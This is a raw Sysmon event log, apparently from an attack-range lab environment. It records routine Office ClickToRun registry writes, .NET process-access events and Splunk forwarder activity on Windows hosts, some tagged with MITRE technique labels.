10341000x800000000000000075826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.280{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE7-607E-2F0D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 10341000x800000000000000075823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.264{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE7-607E-2F0D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x800000000000000075822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 10341000x800000000000000075821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.264{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE7-607E-2F0D-00000000BB01}1836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /h /n "%%1" 13241300x800000000000000075819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.DocumentMacroEnabled.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 13241300x800000000000000075815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\wordhtmlfile\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" 13241300x800000000000000075814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vp "%%1" 13241300x800000000000000075813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /i "%%1" 13241300x800000000000000075811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /h /n "%%1" 13241300x800000000000000075810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "%%1" /o "%%u" 13241300x800000000000000075809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\OnenotePrintto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /j "%%1" "%%2" 13241300x800000000000000075808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n /f "%%1" 13241300x800000000000000075807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Word.Document.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /vu "%%1" 13241300x800000000000000075806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\webcals\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\webcal\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\stssync\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.stssync.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.webcal.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.feed.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\oms\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Client\AppVLp.exe" rundll32.exe C:\Program Files\Microsoft Office\Root\Office16\OMSMAIN.DLL, OmsProtocolHandler %%1 13241300x800000000000000075799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:43.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\feeds\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\feed\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:42.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.mailto.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -c IPM.Note /mailto "%%1" 354300x800000000000000050312Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:41.612{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52527-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050311Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:43.505{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72C30502DE3862E47050CDA727B22E01,SHA256=7D60DA8A12DC4746AF19409CE3A28C072AFBE6210909C11FAC36A56380D8EB2B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000076062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.983{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D122-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D11E-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D11C-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D11A-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.889{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D118-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D116-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D114-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.827{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D112-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D110-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 10341000x800000000000000076053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.780{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-3F0D-00000000BB01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000076052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.780{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5052A832-2C0F-46c7-B67C-1F1FEC37B280}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 10341000x800000000000000076051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.764{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-3F0D-00000000BB01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.764{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-3F0D-00000000BB01}6556C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 13241300x800000000000000076049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{4C599241-6926-101B-9992-00000B65C6F9}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{4795051A-6429-4D63-BCA0-D706532954AC}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.702{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{46E31370-3F7A-11CE-BED6-00AA00611080}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{3D0FD779-0C2D-4708-A9BA-62F7458A5A53}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.655{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{227B1F3B-C276-4DE0-9FAA-C0AD42ADDCF0}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{19FED08E-EFD1-45da-B524-7BE4774A6AEE}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 10341000x800000000000000076043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.592{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-3E0D-00000000BB01}4268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000076042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{13D557B6-A469-4362-BEAF-52BFD0F180E2}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 10341000x800000000000000076041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.577{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-3E0D-00000000BB01}4268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 